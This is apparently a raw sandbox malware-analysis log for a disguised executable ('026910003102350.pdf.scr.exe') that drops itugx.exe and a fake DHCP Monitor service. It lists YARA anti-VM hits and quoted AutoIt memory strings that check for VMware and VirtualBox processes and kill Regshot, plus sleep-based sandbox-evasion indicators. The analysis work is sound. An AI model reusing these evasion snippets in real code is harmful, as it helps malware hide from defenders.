      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      barindex
      Yara detected AntiVM autoit script
      Source: Yara matchFile source: 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: itugx.exe, 00000017.00000003.533363458.0000000000D07000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.529712010.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.534973802.0000000000D26000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.536173123.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000002.542096662.0000000000D2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXESW
      Source: itugx.exe, 00000015.00000003.505153695.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000002.512758146.000000000135A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.506047618.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.508004868.000000000135A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.506688814.000000000135A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.506384568.0000000001356000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXEQ
      Source: itugx.exe, 00000005.00000003.410793804.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.452549594.00000000014CB000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.411039467.00000000014B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.450945660.00000000014C4000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.452340975.00000000014C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")#
      Source: itugx.exe, 00000017.00000003.533363458.0000000000D07000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.529712010.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.534973802.0000000000D26000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.536173123.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000002.542096662.0000000000D2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXED
      Source: itugx.exe, 00000002.00000003.386800246.0000000000E02000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.410540336.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.400635217.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.440840027.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.439624886.00000000013A6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.468989814.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.461712871.00000000013C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")
      Source: itugx.exe, 0000001C.00000003.541378375.00000000012E5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 0000001C.00000003.541599351.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")<
      Source: itugx.exe, 00000010.00000002.470477695.00000000013CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")44V$
      Source: itugx.exe, 0000001C.00000003.541378375.00000000012E5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 0000001C.00000003.541599351.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN?8CJ
      Source: itugx.exe, 00000019.00000003.565987603.000000000195C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000019.00000003.565769789.000000000195C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000019.00000003.563164824.0000000001959000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000019.00000002.569636959.000000000195C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000019.00000003.567142794.000000000195C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXE=
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.0000000007390000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp, wscript.exe, 0000001B.00000002.537175124.0000025B9CBDF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001B.00000003.533357927.0000025B9CBBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001B.00000003.533720665.0000025B9CBDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ORIGINALFILENAMEAUTORUNS.EXEL,
      Source: wscript.exe, 0000001B.00000002.536000753.0000025B9CBBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001B.00000003.533357927.0000025B9CBBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: LFILENAMEAUTORUNS.EXEL,
      Source: itugx.exe, 0000001C.00000002.577313681.0000000001338000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXEL~
      Source: itugx.exe, 00000002.00000003.397098361.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.389382633.0000000000E36000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.369716492.0000000000E36000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000002.412647234.0000000000E3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THENXJ\
      Source: itugx.exe, 00000005.00000003.452396525.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.410793804.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.411039467.00000000014B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000002.455207897.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.450945660.00000000014C4000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451302859.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451585020.00000000014D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN-
      Source: itugx.exe, 00000010.00000002.470505280.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.440840027.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.439624886.00000000013A6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.469351165.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.465307309.00000000013D1000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.467780564.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.461712871.00000000013C4000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.465193535.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.467653750.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.507346397.00000000012C0000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.509588017.00000000012C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
      Source: itugx.exe, 00000002.00000003.400023583.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.399006405.0000000000E96000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000002.412932307.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.396010910.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.400917680.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451422910.0000000001568000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000002.455510913.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451597738.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.467505109.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000002.470674080.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.466572234.0000000001469000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXES
      Source: itugx.exe, 00000002.00000003.400023583.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.399006405.0000000000E96000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000002.412932307.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.396010910.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.400917680.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451422910.0000000001568000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000002.455510913.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451597738.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.467505109.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000002.470674080.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.466572234.0000000001469000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXE
      Source: itugx.exe, 00000015.00000003.467653750.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.467286288.0000000001295000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.505153695.00000000012B4000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.509289794.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.509361220.00000000012BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")L
      Source: itugx.exe, 0000001C.00000002.577313681.0000000001338000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXESUY;`D
      Source: itugx.exe, 00000015.00000003.505153695.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000002.512758146.000000000135A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.506047618.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.508004868.000000000135A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.506688814.000000000135A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.506384568.0000000001356000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXES.
      Found API chain indicative of sandbox detection
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5904Thread sleep count: 64 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5904Thread sleep count: 61 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 748Thread sleep count: 52 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 748Thread sleep count: 89 > 30
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 1916Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 4028Thread sleep count: 33 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 4028Thread sleep count: 56 > 30
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 4136Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5916Thread sleep count: 54 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5916Thread sleep count: 96 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5460Thread sleep count: 60 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5460Thread sleep count: 83 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5596Thread sleep count: 45 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5596Thread sleep count: 82 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 1920Thread sleep count: 64 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 1920Thread sleep count: 55 > 30
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeLast function: Thread delayed
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeWindow / User API: threadDelayed 9667
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeWindow / User API: foregroundWindowGot 455
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeAPI coverage: 5.3 %
      Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeAPI call chain: ExitProcess graph end node
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
      Source: itugx.exe, 00000005.00000003.411039467.00000000014B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VMwaretray.exe") Then#
      Source: itugx.exe, 00000015.00000003.505411546.00000000012AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") Then
      Source: itugx.exe, 00000005.00000003.411039467.00000000014B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then=
      Source: itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") Thena46
      Source: itugx.exe, 00000005.00000003.452233476.00000000014AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe
      Source: itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe\Microso
      Source: itugx.exe, 00000005.00000003.452233476.00000000014AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exe65687
      Source: wscript.exe, 00000001.00000002.363558819.0000000002F60000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: en-USenVMware.VMware.vmuiData\Local\Temp\Folder8_410\itugx.exe89
      Source: wscript.exe, 0000000D.00000002.421779421.000001EDEF160000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: tBC:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe\??\C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exeen-USenVMware.VMware.vmui-----------------------------------------
      Source: rnnsh.xls.0.drBinary or memory string: If ProcessExists("VMwaretray.exe") Then
      Source: itugx.exe, 00000015.00000003.509119527.0000000001299000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exeipt.S
      Source: itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VMwaretray.exe") Then
      Source: itugx.exe, 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: name="VMware.VMware.vmui"
      Source: itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Thenj0
      Source: itugx.exe, 00000010.00000003.468344244.0000000001412000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwaretray.exe^`DE$
      Source: itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Thenk5q
      Source: wscript.exe, 00000016.00000002.491522356.0000021FFC240000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe\??\C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exeen-USenVMware.VMware.vmui-----------------------------------------
      Source: itugx.exe, 00000017.00000003.539485403.0000000000CD1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwaretray.exe
      Source: itugx.exe, 00000015.00000003.467286288.0000000001295000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
      Source: itugx.exe, 00000015.00000003.505411546.00000000012AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then"
      Source: rnnsh.xls.0.drBinary or memory string: If ProcessExists("VboxService.exe") Then
      Source: wscript.exe, 00000001.00000003.361367465.00000000036F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware.VMware.vmuiData\Local\Temp\Folder8_410\itugx.exew
      Source: itugx.exe, 00000015.00000003.509119527.0000000001299000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe6BA444D6.
      Source: itugx.exe, 00000010.00000003.469045500.00000000013AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe3A765687
      Source: itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exe536C7
      Source: itugx.exe, 00000002.00000003.409778317.0000000000E4D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwaretray.exeS
      Source: itugx.exe, 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: <description>"VMware Workstation"</description>
      Source: itugx.exe, 00000002.00000003.397098361.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.389382633.0000000000E36000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.409778317.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451315387.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.452100532.0000000001510000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451193951.00000000014F8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451994345.000000000150D000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.462893753.00000000013F8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.461712871.00000000013F8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.468154413.000000000140E000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.465422358.00000000013FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxTray.exe
      Source: itugx.exe, 00000015.00000003.505411546.00000000012AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
      Source: itugx.exe, 00000005.00000003.451994345.000000000150D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwaretray.exen*
      Source: wscript.exe, 0000001B.00000002.534995230.0000025B9C8D0000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe\??\C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exeen-USenVMware.VMware.vmui-----------------------------------------[
      Source: itugx.exe, 0000001C.00000002.577313681.0000000001338000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exe
      Source: itugx.exe, 00000005.00000003.410793804.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451151702.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.411039467.00000000014B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.462582507.00000000013BF000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.440840027.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.439624886.00000000013A6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.467653750.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.467286288.0000000001295000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.505411546.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 0000001C.00000003.541378375.00000000012E5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 0000001C.00000003.541599351.00000000012F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") Then
      Source: itugx.exe, 0000001C.00000002.577313681.0000000001338000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwaretray.exe#
      Source: rnnsh.xls.0.drBinary or memory string: If ProcessExists("VBoxTray.exe") Then
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CDE6A3 VirtualQuery,GetSystemInfo,
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CCA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CDC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CEB348 FindFirstFileExA,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0037E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0037D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0038A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
